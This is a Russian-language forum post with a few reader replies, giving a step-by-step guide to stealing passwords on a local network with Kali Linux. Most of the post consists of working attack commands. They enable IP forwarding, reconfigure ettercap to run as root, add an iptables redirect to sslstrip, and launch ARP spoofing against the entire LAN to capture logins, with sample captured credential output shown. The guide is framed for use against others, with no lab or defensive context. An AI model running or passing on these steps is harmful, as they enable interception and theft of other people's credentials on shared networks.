Как перехватить пароли в локальной сети с помощью

Авторизация
 
  • Автор

    Как перехватить пароли в локальной сети с помощью Kali Linux
    Итак, наш алгоритм действий:

    1. Настраиваем ip_forward

    2. Настраиваем etter.conf

    3. Настраиваем iptables

    4. Запускаем sslstrip

    5. Запускаем ettercap с плагином autoadd

    6. Пьем пивасик

    7. Приходим и радуемся.

    8. Открываем консоль и пишем:

    Код

    echo '1' > /proc/sys/net/ipv4/ip_forward

    1. Открываем консоль опять же:

    Пишем:

    Код

    leafpad /etc/etter.conf

    UPD by 14.04.2014: Если открывается пустое окно, то пишем это:

    Код

    leafpad /etc/ettercap/etter.conf

    В поле [privs] находим строчки:

    Код

    ec_uid = %тут какое-то значение% # nobody is the default
    ec_gid = %тут какое-то значение% # nobody is the default

    Изменяем %тут какое-то значение% на 0.

    В итоге будет так:

    Код

    ec_uid = 0 # nobody is the default
    ec_gid = 0 # nobody is the default

    Далее жмем ctrl+f и вводим туда iptables

    Нас кидает на следующие строчки:
    Код

    if you use iptables:

    #redir_command_on = «iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport»
    #redir_command_off = «iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport»

    Раскомментируем redir_command_on и redir_command_off

    В итоге будет так:

    Код

    if you use iptables:

    redir_command_on = «iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport»
    redir_command_off = «iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport»

    1. Теперь нам нужно настроить iptables:

    Вводим команду:

    Код

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

    Теперь весь трафик с 80 порта у нас будет переадресовываться на 8080, на котором мы потом запустим sslstrip

    1. Активируем sslstip:

    Код

    sslstrip -l 8080 -a

    -l — порт на котором слушаем
    -a — снифать все

    1. Запуск атаки

    Код

    ettercap -T -q -P autoadd -i wlan0 -M arp:remote // //

    -T — указываем, что в текстовом режиме
    -q — не показываем содержимое пакетов, только пароли
    -P autoadd — подключаем плагин autoadd, чтобы у нас все будущие клиенты сети тоже были атакованы
    -i wlan0 — указываем, что наш интерфейс это wlan0
    -M arp:remote — указываем, что нам нужен именно ARP Spoofing
    // // — атакуем всю LAN сеть

    Итак, атака запущена.

    Чтобы ее отменить нужно нажать q на англ раскладки ( Не CTRL+C! А именно q, чтобы восстановить arp таблицу! )

    1. Теперь ждем

    2. Как только кто-то залогинится куда либо, то у нас в терминале с ettercap будет строка вида:

    Код

    HTTP: 217.69.139.60:80 -> USER: offsec PASS: password123 INFO:
    Где после USER идет логин, после PASS идет пароль, после INFO будет ссылка
    (кто щарит поставте + ) :E:


  • Закладка добавлена


  • а все снифферы из инета удалили что ли?


  • спасибо


  • Плюс поставить? Уже.


  • спс

Авторизация